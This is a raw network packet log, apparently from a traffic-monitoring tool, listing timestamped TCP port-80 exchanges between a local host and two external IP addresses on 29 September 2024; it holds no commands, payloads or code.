                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928065062 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928112030 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928152084 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928189993 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928227901 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928267956 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.928307056 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933182955 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933224916 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933285952 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933326960 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933348894 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933366060 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933407068 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933408976 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933445930 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933506012 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933547020 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933583021 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933621883 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933661938 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933701038 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933739901 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933779955 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933818102 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933856964 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933895111 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933933020 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.933971882 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934011936 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934077024 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934114933 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934154034 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934194088 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934232950 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934271097 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934310913 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934350967 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934389114 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934425116 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934461117 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934501886 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934540987 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934580088 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934617996 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934658051 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934703112 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934741974 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934779882 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934819937 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934859037 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934896946 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934935093 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.934973955 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935018063 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935065985 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935105085 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935143948 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935183048 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935223103 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935260057 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.935298920 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940121889 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940191984 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940232038 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940293074 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940304995 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940331936 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940362930 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940371990 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940412998 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940488100 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940541983 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940577030 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940615892 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940654993 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940700054 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940740108 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940792084 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940830946 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940869093 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940907955 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940947056 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.940984964 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941050053 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941090107 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941128969 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941168070 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941206932 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941246033 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941284895 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941323042 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941359043 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941396952 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941436052 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941473961 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941513062 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941551924 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941591024 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941627979 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941667080 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941705942 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941744089 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941782951 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941822052 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941859961 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941898108 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941936970 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.941978931 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942023993 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942063093 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942101002 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942138910 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942176104 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942214012 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942251921 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.942289114 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947273016 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947288990 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947309017 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947325945 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947341919 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947360039 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947376013 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947422028 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947432995 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947438955 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947451115 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947473049 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947479010 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947490931 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947508097 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947525024 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947540998 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947557926 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947575092 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947591066 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947607994 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947624922 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947642088 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947669983 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947695017 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947711945 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947729111 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947751999 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947768927 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947783947 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947803974 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947819948 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947837114 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947854042 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947870016 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947889090 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947906017 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947922945 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.947938919 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.973344088 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.978126049 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.978307962 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.978368044 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.978368044 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.978415966 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983161926 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983223915 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983266115 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983326912 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983367920 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983441114 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983480930 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983520985 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983560085 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983598948 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983656883 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983700991 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983740091 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983778954 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983817101 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983855963 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983895063 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983933926 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.983973026 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984011889 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984071016 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984108925 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984148026 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984186888 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984225988 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984270096 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984309912 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984349012 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984388113 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984426975 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984462023 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984502077 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984541893 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984580994 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984620094 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984663010 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984703064 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984743118 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984785080 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:10.984822989 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:11.004595041 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:11.009635925 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:11.009732008 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:11.014677048 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:11.014722109 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.192807913 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.194080114 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.198961973 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.441595078 CEST8049704185.215.113.22192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.451347113 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.456312895 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.456480026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.456480026 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.461313963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:12.489018917 CEST4970480192.168.2.5185.215.113.22
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077673912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077760935 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077807903 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077843904 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077879906 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077959061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.077969074 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078008890 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078057051 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078104973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078139067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078151941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078182936 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078202009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:13.078288078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114105940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114236116 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114293098 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114515066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.114562988 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.306873083 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.306934118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.306998968 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307020903 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307065010 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307115078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307123899 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307185888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307233095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307234049 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307286978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307332993 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307368994 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307463884 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307512045 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307512999 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307559013 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307620049 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307655096 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307684898 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307729006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307750940 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307799101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307841063 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.307843924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.308732986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.308779001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.312717915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.312772989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.312832117 CEST4970680192.168.2.5147.45.47.81
